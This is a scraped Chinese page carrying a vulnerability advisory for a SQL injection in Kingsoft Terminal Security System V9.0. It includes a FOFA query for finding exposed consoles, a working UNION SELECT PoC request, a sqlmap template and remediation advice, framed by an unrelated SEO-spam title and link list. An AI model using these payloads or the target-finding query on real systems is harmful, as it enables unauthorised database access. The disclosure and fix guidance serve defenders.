当前位置: 首页 > news >正文

网站的建设建议做网站有包括哪些东西

网站的建设建议,做网站有包括哪些东西,网站设计谈判,临沂市建设官方网站0x01 产品简介 金山终端安全系统是一款为企业提供终端防护的安全产品#xff0c;针对恶意软件、病毒和外部攻击提供防范措施#xff0c;帮助维护企业数据和网络。 0x02 漏洞概述 金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞#xff0c;该…0x01 产品简介 金山终端安全系统是一款为企业提供终端防护的安全产品针对恶意软件、病毒和外部攻击提供防范措施帮助维护企业数据和网络。 0x02 漏洞概述 金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞该漏洞是由于金山终端安全系统未对用户的输入进行有效的过滤直接将其拼接进了SQL查询语句中导致系统出现SQL注入漏洞。 0x03 影响范围 金山终端安全系统V9.SP1.E1008 0x04 复现环境 FOFAtitle用户登录-金山终端安全系统V9.0Web控制台 0x05 漏洞复现 PoC POST /inter/update_software_info_v2.php HTTP/1.1 Host: your-ip Content-Type: application/x-www-form-urlencodedtype-1UNIONSELECT1,user(),3,4,5,6,7,8--keypageCount0curPage 查询当前用户 延时注入 Sqlmap验证  数据包放txt里面 POST /inter/update_software_info_v2.php HTTP/1.1 Host: your-ip Content-Type: application/x-www-form-urlencodedtype-100*keypageCount0curPage0x06 修复建议  升级修复方案 官方已经推出了新版本修复了漏洞。建议所有受影响的用户尽快访问官方网站更新版本至新版本。https://www.ejinshan.net/lywz/index 临时缓解方案 通过网络ACL策略限制访问来源例如只允许来自特定IP地址或地址段的访问请求。另外作为安全建议不要将集权设备的Web管理控制台开放在互联网上并且仅允许可信IP进行访问。
http://www.dnsts.com.cn/news/32890.html

相关文章:

  • 网站如何做信誉认证网站网站模板
  • 事业单位网站开发工作规程wordpress 版块
  • 德清建设银行网站新网域名注册步骤
  • 网站服务器维护需要多久自适应网站建设模板
  • 广州网站建设网络推广邢台网站建设邢台
  • 一个网站的建设需要什么东西榆林网站建设熊掌号
  • 超酷 flash 网站太原企业建站模板
  • 怎么做电子商务的网站推广wordpress4.6+中文
  • 网站开发地图中国建设银行网站主页
  • 教学设计的网站做网站找哪个部门
  • 谷歌网站优化新能源课件网站开发新能源
  • 南京溧水城市建设集团网站企业网站建设与网络营销的关系
  • 新泰市住房和城乡建设局网站怎样开一家公司
  • 视频付费点播网站怎么做深圳有几个区2022
  • 网站推广的建议商标综合查询
  • windows系统怎么做ppt下载网站钱包网站建设
  • 根路径 网站贵州两学一做专题网站
  • 海珠区做网站的公司wordpress_ joomla_ drupal
  • 深圳博大建设集团网站男人与女人做视频网站
  • 做网站是干嘛的宁波定制网站建设解决方案
  • 建设游戏网站需要什么设备潍坊百度seo公司
  • 自己开发电商网站难吗域名解析错误不能打开网页
  • 常平东莞网站建设重庆飘逸科技有限公司
  • 长沙建站网站模板谷歌广告怎么投放
  • 青浦企业网站制作net网站开发微信支付
  • 梦幻西游网页版官方网站百度快照网址
  • phpcms v9企业网站模板:蓝色电子科技公司网站模板网页设计结果分析怎么写
  • 网站建设服务公司有哪些中国机械加工网卸粮四通
  • 网站域名选择景德镇陶瓷学院校友做网站的
  • 画图在什么网站上做兼职如何在百度上打广告